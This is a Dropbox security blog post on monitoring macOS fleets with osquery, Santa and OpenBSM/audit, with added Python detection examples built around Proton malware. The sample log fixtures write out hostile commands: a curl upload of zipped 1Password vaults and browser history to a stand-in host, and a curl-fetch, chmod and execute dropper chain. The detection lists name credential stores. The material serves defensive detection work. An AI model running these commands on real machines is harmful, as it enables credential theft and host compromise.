Effective URL: https://dropbox.tech/security/macos-monitoring-the-open-source-way
MACOS MONITORING THE OPEN SOURCE WAY

By Michael George • Apr 26, 2018

Let’s say a machine in your corporate fleet gets infected with malware. How
would you detect it? How would you find out what happened on the machine: what
the malware did, whether it stole your browser’s passwords, which network
connections it made, whether it was mining cryptocurrency? Good telemetry and a
good host monitoring solution let you collect the context needed to answer these
questions.

Proper host monitoring on macOS can be difficult for many organizations. Mature
tools that proactively detect security incidents are hard to find. Even when you
find a tool that fits your needs, you may run into unexpected performance
problems that make machines nearly unusable for your employees, or hosts that
unexpectedly go down with a kernel panic. Even if you can pinpoint the cause,
you may be unable to configure the tool so that the problem stops recurring.
After running into difficulties like these at Dropbox, we set out to find an
alternative.

One of the first things we did was create a list of requirements and success
criteria:

 * Stability and minimal performance impact
   * Kernel panics and obvious delays or other lockups are certainly not
     acceptable
 * Record interesting activity on the host
   * Process spawning
   * Filesystem Modifications
   * Network activity
   * Details about configuration settings and installed applications
 * Record details about these observables which would tell us:
   * Date and time
   * How observations are related (parent-child relationships, or shared keys
     which connect events, like process id)
   * Additional details to assess the relevance or impact of the event

During the investigation we reviewed a number of tools that could solve some of
our problems, but none of the tools could solve all of our problems. After
careful review we decided that we didn’t want to reinvent the wheel and that
having multiple tools that each solved a specific requirement would better serve
our needs.

We eventually landed on three open source tools, osquery, Santa, and the
OpenBSM/Audit system, with each serving a specific purpose:

 * osquery provides periodic snapshots describing the state of a machine, and
   therefore how that state changes between snapshots
 * Santa provides real-time process launch events with details about the
   executing binary
 * OpenBSM/Audit is a real-time system call monitoring facility in the macOS
   kernel that can provide network, file operation, administrative, and other
   system interaction events


OSQUERY

osquery is an open source operating system instrumentation framework for
Windows, macOS, Linux, and FreeBSD, created by Facebook. It exposes the state of
the system through a SQL interface. Some of its useful features are:

 * The ability to parse preference and configuration files and to list installed
   applications, currently running processes, file path information, and
   installed browser plugins.
   * This is useful when looking for suspicious applications or checking whether
     a machine has a specific configuration setting.
   * osquery ships with several packs of useful queries, and the core application
     is regularly updated with new features.

Using osquery we can run queries that search a host for IOCs (Indicators of
Compromise), such as those of the recent Proton malware:

(Figure: example query looking for Proton malware, from the osquery attack pack)
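The query in the figure is not reproduced on the page, so the following is an added example (not the osquery pack's query, and not Dropbox's tooling) of the same kind of IOC hunt. osquery serves its tables through SQLite, so a query can be prototyped against an in-memory SQLite database that has the relevant columns before it is shipped to osqueryd. The launchd and hash rows, the labels and hashes in the IOC list, and the "Example Corp" agent are all constructed for the example; none of them are real Proton indicators.

```python
import sqlite3

# Constructed rows standing in for what osquery's launchd and hash tables return on a
# host. Labels, paths and hashes are hypothetical, not real Proton indicators.
LAUNCHD_ROWS = [
    # (path, name, label, program, program_arguments)
    ("/System/Library/LaunchDaemons/com.apple.securityd.plist", "com.apple.securityd.plist",
     "com.apple.securityd", "/usr/sbin/securityd", "/usr/sbin/securityd -i"),
    ("/Users/alice/Library/LaunchAgents/com.example.updater.plist", "com.example.updater.plist",
     "com.example.updater", "/Users/alice/Library/Caches/updater/agent",
     "/Users/alice/Library/Caches/updater/agent --daemon"),
    ("/Users/alice/Library/LaunchAgents/com.apple.update.helper.plist", "com.apple.update.helper.plist",
     "com.apple.update.helper", "/Users/alice/.cache/helper", "/Users/alice/.cache/helper"),
]
HASH_ROWS = [
    # (path, sha256)
    ("/usr/sbin/securityd", "0" * 64),
    ("/Users/alice/Library/Caches/updater/agent", "1" * 64),
    ("/Users/alice/.cache/helper", "2" * 64),
]
# A hypothetical IOC feed: launchd labels and binary hashes to sweep the fleet for.
IOC_LABELS = ["com.example.updater"]
IOC_SHA256 = ["1" * 64]


def build_db():
    """In-memory SQLite stand-in for the osquery launchd and hash tables."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE launchd (path TEXT, name TEXT, label TEXT, program TEXT, program_arguments TEXT)")
    db.execute("CREATE TABLE hash (path TEXT, sha256 TEXT)")
    db.executemany("INSERT INTO launchd VALUES (?, ?, ?, ?, ?)", LAUNCHD_ROWS)
    db.executemany("INSERT INTO hash VALUES (?, ?)", HASH_ROWS)
    return db


def find_ioc_hits(db, labels, hashes):
    """Persistence items whose label or program hash matches the IOC feed.

    Joining hash on launchd.program gives osquery's hash table the path
    constraint it requires, so the same SQL runs unchanged in osqueryi.
    """
    if not labels and not hashes:
        return []
    marks = lambda xs: ",".join("?" * len(xs)) or "NULL"   # IN (NULL) matches nothing
    sql = f"""
        SELECT l.label, l.program, h.sha256
        FROM launchd AS l
        LEFT JOIN hash AS h ON h.path = l.program
        WHERE l.label IN ({marks(labels)}) OR h.sha256 IN ({marks(hashes)})
        ORDER BY l.label
    """
    return db.execute(sql, (*labels, *hashes)).fetchall()


def find_masquerading_apple_agents(db):
    """Heuristic sweep that needs no IOC: an Apple-looking label whose program
    lives outside the paths Apple installs to."""
    sql = """
        SELECT label, program
        FROM launchd
        WHERE label LIKE 'com.apple.%'
          AND program NOT LIKE '/System/%'
          AND program NOT LIKE '/usr/%'
          AND program NOT LIKE '/bin/%'
          AND program NOT LIKE '/sbin/%'
          AND program NOT LIKE '/Library/Apple/%'
        ORDER BY label
    """
    return db.execute(sql).fetchall()


if __name__ == "__main__":
    db = build_db()
    for row in find_ioc_hits(db, IOC_LABELS, IOC_SHA256):
        print("IOC hit:", row)
    for row in find_masquerading_apple_agents(db):
        print("Apple-labelled agent outside system paths:", row)
```

The first function is the IOC sweep the figure illustrates; the second shows why a SQL interface pays off beyond IOC matching, since a label/location mismatch is a hunting heuristic that needs no feed at all.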

With osquery we can get a lot of information about the current state of a
machine and, by comparing scheduled snapshots, something about its previous
states. That still leaves a gap: what about events that occur between scheduled
osquery queries?

Here comes Santa Claus 🎵!


SANTA

Santa is an open source tool developed by Google specifically for macOS. It
provides information on executed processes and some disk events. For processes,
Santa can provide the following info:

 * The sha256 hash of the executed binary
 * Quarantine URL, the full URL the binary was downloaded from, if it was
   downloaded
 * PID, the process id
 * PPID, the parent process id, which is essential for building process trees
 * The “Common Name” field and sha256 hash of the certificate used to sign the
   binary

Another powerful feature that we won’t cover here is Santa’s ability to prevent
execution of binaries (binary blacklisting and whitelisting).

Using the data we collect from Santa we can investigate most execution actions
performed on hosts. Interestingly, this lets us see execution events from the
recent Proton malware such as the exfiltration (“exfil”) process:

(Figure: Proton uses cURL with a file POST to exfil data off hosts)

We can even see what was exfil’d from hosts, such as 1Password vaults, Chrome
browser history, etc.

(Figure: Proton used zip to copy 1Password vaults among other sensitive files)

Using the sha256 hashes provided in the Santa logs we can investigate the
reputation of some of the files dropped by Proton.

(Figure: installing Proton malware)
(Figure: investigating a hash in VirusTotal)
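The exfil and archive activity described above, as detection logic run over constructed Santa-style log lines. This is an added example, not Dropbox's tooling or Santa's own code. Santa's file log writes one record per execution decision as pipe-delimited key=value pairs; the four records below are constructed to mimic that shape, with fake hashes, a fake download host, and a hypothetical dropped binary under ~/Library/Caches rather than real Proton paths.

```python
import re

# Constructed Santa-style log lines (not captured data). Hashes, the download host and
# the dropped binary's path are invented for the example.
SAMPLE_LOG = """\
[2018-04-26T16:01:01.000Z] I santad: action=EXEC|decision=ALLOW|reason=CERT|sha256={h1}|path=/Applications/Example.app/Contents/MacOS/Example|args=/Applications/Example.app/Contents/MacOS/Example|cert_sha256={c1}|cert_cn=Developer ID Application: Example Corp|pid=4300|ppid=1|uid=501|user=alice|gid=20|group=staff|mode=M
[2018-04-26T16:01:02.000Z] I santad: action=EXEC|decision=ALLOW|reason=SCOPE|sha256={h2}|path=/Users/alice/Library/Caches/agent|args=/Users/alice/Library/Caches/agent|quarantine_url=https://203.0.113.7/Example-1.0.dmg|pid=4301|ppid=4300|uid=501|user=alice|gid=20|group=staff|mode=M
[2018-04-26T16:01:03.000Z] I santad: action=EXEC|decision=ALLOW|reason=BINARY|sha256={h3}|path=/usr/bin/zip|args=/usr/bin/zip -r /tmp/p.zip /Users/alice/Library/Application Support/1Password 4 /Users/alice/Library/Application Support/Google/Chrome/Default/History|cert_sha256={c2}|cert_cn=Software Signing|pid=4310|ppid=4301|uid=501|user=alice|gid=20|group=staff|mode=M
[2018-04-26T16:01:04.000Z] I santad: action=EXEC|decision=ALLOW|reason=BINARY|sha256={h4}|path=/usr/bin/curl|args=/usr/bin/curl -F file=@/tmp/p.zip https://203.0.113.5/upload|cert_sha256={c2}|cert_cn=Software Signing|pid=4311|ppid=4301|uid=501|user=alice|gid=20|group=staff|mode=M
""".format(h1="1" * 64, h2="2" * 64, h3="3" * 64, h4="4" * 64, c1="a" * 64, c2="b" * 64)

# curl switches that send a local file or request body somewhere.
UPLOAD_FLAGS = {"-F", "--form", "-T", "--upload-file", "-d", "--data", "--data-binary", "--data-raw"}
ARCHIVERS = {"zip", "tar", "ditto", "hdiutil"}
# Path fragments of credential and history stores worth alerting on when archived.
SENSITIVE_MARKERS = ("1Password", "Chrome/Default/History", "Chrome/Default/Login Data",
                     "Library/Keychains", "/.ssh/", "Cookies")


def parse_santa_line(line):
    """Split '[ts] I santad: k=v|k=v|...' into a dict, keeping the timestamp as 'ts'.
    Each field is split on its first '=' only, because args can itself contain '='."""
    m = re.match(r"\[([^\]]+)\] \w santad: (.*)$", line)
    if not m:
        return None
    fields = {"ts": m.group(1)}
    for kv in m.group(2).split("|"):
        key, _, value = kv.partition("=")
        fields[key] = value
    return fields


def parse_santa_log(text):
    events = [parse_santa_line(line) for line in text.splitlines()]
    return [e for e in events if e and e.get("action") == "EXEC"]


def detect(events):
    """Return (pid, rule, args) for executions matching the exfil patterns."""
    findings = []
    for e in events:
        binary = e.get("path", "").rsplit("/", 1)[-1]
        args = e.get("args", "")
        argv = args.split()
        if binary == "curl" and any(a in UPLOAD_FLAGS for a in argv):
            findings.append((int(e["pid"]), "curl_upload", args))
        if binary in ARCHIVERS and any(mark in args for mark in SENSITIVE_MARKERS):
            findings.append((int(e["pid"]), "archive_sensitive", args))
    return findings


def hashes_for_reputation(events):
    """sha256 of binaries worth a reputation lookup: unsigned ones, or ones still carrying
    a quarantine URL, i.e. freshly downloaded."""
    return sorted({e["sha256"] for e in events if not e.get("cert_cn") or e.get("quarantine_url")})


def spawning_parents(events, findings):
    """Pivot on PPID: which binaries launched the processes that triggered a finding."""
    by_pid = {int(e["pid"]): e for e in events}
    parents = set()
    for pid, _, _ in findings:
        ppid = int(by_pid[pid]["ppid"])
        if ppid in by_pid:
            parents.add(by_pid[ppid]["path"])
    return sorted(parents)


if __name__ == "__main__":
    evs = parse_santa_log(SAMPLE_LOG)
    for finding in detect(evs):
        print("finding:", finding)
    print("check reputation of:", hashes_for_reputation(evs))
    print("spawned by:", spawning_parents(evs, detect(evs)))
```

The PPID pivot is the step that turns two standalone alerts (an archive of credential stores and a curl upload) into one story: both were spawned by an unsigned, freshly downloaded binary, which is the hash to submit to VirusTotal.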


OPENBSM/AUDIT


With osquery and Santa we have a really good picture of the executions that
occur on a host. However, we are still missing information about what specific
applications do with respect to network connections and filesystem
interactions. osquery can give us some of this by querying the
process_open_files or process_open_sockets tables, but there is still a chance
we miss events that happen between query intervals. Therefore, we need a
real-time pipeline like the one Santa gives us.

To get this data we use the OpenBSM/Audit (or simply audit) subsystem. It is
built into the macOS kernel and based on OpenBSM, and it provides a real-time
stream of records describing the host’s activity. When configuring audit you
tell it which audit classes of system calls to record; for example, to monitor
network events you enable the nt class. The kernel then writes matching records
to a binary BSM trail, and two tools shipped with audit process that trail:
auditreduce selects records (by class, event type, user, and so on), and
praudit converts the binary records to human-readable text, or to XML with
praudit -x.

After setting up the appropriate log handling for audit, you can enable the
classes that supply the missing pieces of our puzzle: file read (fr), file
create (fc), file write (fw), and network (nt) events. Together these show what
a process actually does on the system, beyond the fact that it launched.

(Figure: Proton malware storing stolen credentials before exfiltration)
(Figure: network call captured by the macOS audit system)
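To join the audit stream against Santa's PIDs, its records have to be parsed into a common event shape. The Python below is an added example (not part of the original post and not Dropbox's pipeline) that parses the XML praudit -x produces and normalizes each record to a small event dict keyed by pid. The three records are constructed in the shape praudit emits for connect(2), open(2) and execve(2); the address, PIDs and paths are invented.

```python
import re
import xml.etree.ElementTree as ET
from datetime import datetime

# Constructed records in the shape `praudit -x` prints for a BSM trail: an execve(2) from
# the ex class, an open-for-write from the fw/fc classes and a connect(2) from the nt
# class. Deliberately out of time order to show the sort. PIDs, paths and the address are
# invented for the example.
SAMPLE_XML = """<?xml version='1.0' ?>
<audit>
<record version="11" event="execve(2)" modifier="0" time="Thu Apr 26 16:01:03 2018" msec=" + 500 msec" >
<exec_args><arg>/usr/bin/curl</arg><arg>-F</arg><arg>file=@/tmp/p.zip</arg><arg>https://203.0.113.5/upload</arg></exec_args>
<path>/usr/bin/curl</path>
<attribute mode="100755" uid="root" gid="wheel" fsid="16777220" nodeid="4242" device="0" />
<subject audit-uid="alice" uid="alice" gid="staff" ruid="alice" rgid="staff" pid="4311" sid="100005" tid="4311 0.0.0.0" />
<return errval="success" retval="0" />
</record>
<record version="11" event="open(2) - write,creat,trunc" modifier="0" time="Thu Apr 26 16:01:03 2018" msec=" + 120 msec" >
<path>/tmp/p.zip</path>
<attribute mode="100644" uid="alice" gid="wheel" fsid="16777220" nodeid="1234" device="0" />
<subject audit-uid="alice" uid="alice" gid="staff" ruid="alice" rgid="staff" pid="4310" sid="100005" tid="4310 0.0.0.0" />
<return errval="success" retval="3" />
</record>
<record version="11" event="connect(2)" modifier="0" time="Thu Apr 26 16:01:04 2018" msec=" + 20 msec" >
<argument arg-num="1" value="0x5" desc="fd" />
<socket-inet type="2" port="443" addr="203.0.113.5" />
<subject audit-uid="alice" uid="alice" gid="staff" ruid="alice" rgid="staff" pid="4311" sid="100005" tid="4311 0.0.0.0" />
<return errval="success" retval="0" />
</record>
</audit>
"""


def _timestamp(rec):
    """Combine the record's time and ' + N msec' attributes into an ISO-8601 string."""
    base = datetime.strptime(rec.get("time"), "%a %b %d %H:%M:%S %Y")
    m = re.search(r"(\d+)", rec.get("msec", ""))
    ms = int(m.group(1)) if m else 0
    return base.replace(microsecond=ms * 1000).isoformat(timespec="milliseconds")


def normalize_record(rec):
    """Reduce one <record> to {ts, syscall, pid, uid, success, kind, detail}."""
    subj = rec.find("subject")
    if subj is None:  # header/trailer-only records carry no subject token
        return None
    ret = rec.find("return")
    ev = {
        "ts": _timestamp(rec),
        "syscall": rec.get("event"),
        "pid": int(subj.get("pid")),
        "uid": subj.get("uid"),
        "success": ret is not None and ret.get("errval") == "success",
    }
    exec_args = rec.find("exec_args")
    sock = rec.find("socket-inet")
    if exec_args is not None:  # checked first: exec records also carry a <path>
        ev["kind"] = "exec"
        ev["detail"] = " ".join(a.text or "" for a in exec_args.findall("arg"))
    elif sock is not None:
        ev["kind"] = "net"
        ev["detail"] = f"{sock.get('addr')}:{sock.get('port')}"
    elif rec.find("path") is not None:
        ev["kind"] = "file"
        ev["detail"] = rec.findtext("path")
    else:
        ev["kind"], ev["detail"] = "other", ""
    return ev


def parse_praudit_xml(text):
    """Parse praudit -x output into time-ordered event dicts."""
    root = ET.fromstring(text)
    events = [normalize_record(r) for r in root.iter("record")]
    return sorted((e for e in events if e), key=lambda e: e["ts"])


def events_by_pid(events):
    """Group events by pid, the key shared with Santa's exec records."""
    grouped = {}
    for e in events:
        grouped.setdefault(e["pid"], []).append(e)
    return grouped


if __name__ == "__main__":
    for e in parse_praudit_xml(SAMPLE_XML):
        print(e["ts"], e["pid"], e["kind"], e["detail"])
```

In production the input would be `praudit -x` reading from the trail file or from the /dev/auditpipe device rather than an inline string; the normalization is the same.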

All of the above interactions could be seen using individual events, which is
great. However, what if we combine these events into something more?

(Figure: an example of a process tree for a malicious Office document)

By correlating timestamps, PID, PPID, network events, and file events we can
build process trees. Each tree tells the story of what happened when a process
ran. The example above is a common attack technique: an Office document with a
malicious macro pulls malware from the internet and compromises the host. Once
the process tree gives us a clear picture of what happened, we can make judgment
calls about the actions of applications that look legitimate in isolation but
are malicious in the observed execution context.
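The process-tree idea above, as an added worked example (not Dropbox's code): given already-normalized exec, file and network events of the kind Santa and audit supply, the functions below stitch them into a tree by PID/PPID, order everything by timestamp, and flag processes with network activity whose ancestry leads back to an Office application. The event list is constructed to model the malicious-macro scenario described above; the host, paths and PIDs are invented.

```python
from dataclasses import dataclass, field

# Constructed, already-normalized events modelling a macro dropper: Word opens a .docm,
# spawns a shell, the shell fetches a payload with curl, marks it executable and runs it.
SAMPLE_EVENTS = [
    {"ts": "2018-04-26T16:00:00Z", "kind": "exec", "pid": 500, "ppid": 1,
     "detail": "/Applications/Microsoft Word.app/Contents/MacOS/Microsoft Word"},
    {"ts": "2018-04-26T16:00:05Z", "kind": "file", "pid": 500, "detail": "read /Users/alice/Downloads/invoice.docm"},
    {"ts": "2018-04-26T16:00:07Z", "kind": "exec", "pid": 510, "ppid": 500,
     "detail": "/bin/sh -c curl -s https://203.0.113.9/s -o /tmp/.s && chmod +x /tmp/.s && /tmp/.s"},
    {"ts": "2018-04-26T16:00:08Z", "kind": "exec", "pid": 511, "ppid": 510, "detail": "/usr/bin/curl -s https://203.0.113.9/s -o /tmp/.s"},
    {"ts": "2018-04-26T16:00:08Z", "kind": "net", "pid": 511, "detail": "connect 203.0.113.9:443"},
    {"ts": "2018-04-26T16:00:09Z", "kind": "file", "pid": 511, "detail": "create /tmp/.s"},
    {"ts": "2018-04-26T16:00:10Z", "kind": "exec", "pid": 512, "ppid": 510, "detail": "/bin/chmod +x /tmp/.s"},
    {"ts": "2018-04-26T16:00:11Z", "kind": "exec", "pid": 513, "ppid": 510, "detail": "/tmp/.s"},
    {"ts": "2018-04-26T16:00:12Z", "kind": "net", "pid": 513, "detail": "connect 203.0.113.9:8443"},
]

OFFICE_APPS = ("Microsoft Word", "Microsoft Excel", "Microsoft PowerPoint")


@dataclass
class Proc:
    pid: int
    ppid: int
    ts: str
    cmd: str
    events: list = field(default_factory=list)    # (ts, kind, detail) for file/net activity
    children: list = field(default_factory=list)


def build_tree(events):
    """Return (roots, nodes). Exec events become Proc nodes; file/net events attach to
    their pid. Assumes PIDs are not recycled inside the window; on a real fleet key on
    (pid, exec timestamp) or Santa's pidversion instead."""
    ordered = sorted(events, key=lambda e: e["ts"])
    nodes = {}
    for e in ordered:
        if e["kind"] == "exec":
            nodes[e["pid"]] = Proc(e["pid"], e["ppid"], e["ts"], e["detail"])
    for e in ordered:
        if e["kind"] != "exec" and e["pid"] in nodes:
            nodes[e["pid"]].events.append((e["ts"], e["kind"], e["detail"]))
    roots = []
    for n in nodes.values():
        parent = nodes.get(n.ppid)
        if parent is not None and parent is not n:
            parent.children.append(n)
        else:
            roots.append(n)   # parent launched before our window (e.g. launchd)
    return roots, nodes


def render(roots):
    """Indented, time-ordered text tree: one line per process, one per attached event."""
    lines = []

    def walk(n, depth):
        pad = "  " * depth
        lines.append(f"{pad}[{n.ts}] pid={n.pid} ppid={n.ppid} {n.cmd}")
        for ts, kind, detail in n.events:
            lines.append(f"{pad}    {kind}: {detail}")
        for child in sorted(n.children, key=lambda c: c.ts):
            walk(child, depth + 1)

    for root in sorted(roots, key=lambda r: r.ts):
        walk(root, 0)
    return lines


def lineage(nodes, pid):
    """Root-to-leaf chain of pids for a process, stopping at unknown or cyclic ppids."""
    chain = []
    while pid in nodes and pid not in chain:
        chain.append(pid)
        pid = nodes[pid].ppid
    return chain[::-1]


def office_descendants_with_network(nodes):
    """PIDs that made a network connection and descend from an Office app."""
    hits = []
    for pid, n in sorted(nodes.items()):
        if not any(kind == "net" for _, kind, _ in n.events):
            continue
        ancestors = lineage(nodes, pid)[:-1]
        if any(app in nodes[a].cmd for a in ancestors for app in OFFICE_APPS):
            hits.append(pid)
    return hits


if __name__ == "__main__":
    roots, nodes = build_tree(SAMPLE_EVENTS)
    print("\n".join(render(roots)))
    print("office-spawned network activity:", office_descendants_with_network(nodes))
```

The rendered tree is what an analyst reads; the last function is the judgment call from the paragraph above turned into a rule, since curl and an unnamed binary in /tmp are each unremarkable on their own and only become suspicious because Word is their ancestor.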

At Dropbox we are strong proponents for open source software and even stronger
proponents for security. Being worthy of trust is our #1 cultural value and is
core to our mission as a security team. If you’re interested in working on hard
problems, our security team is always hiring talented people.

Further Reading:

 * https://github.com/google/santa
 * https://osquery.io/
 * https://opensource.apple.com/source/OpenBSM/OpenBSM-21/
 * https://blog.malwarebytes.com/threat-analysis/mac-threat-analysis/2017/05/handbrake-hacked-to-drop-new-variant-of-proton-malware/
 * https://www.virustotal.com/
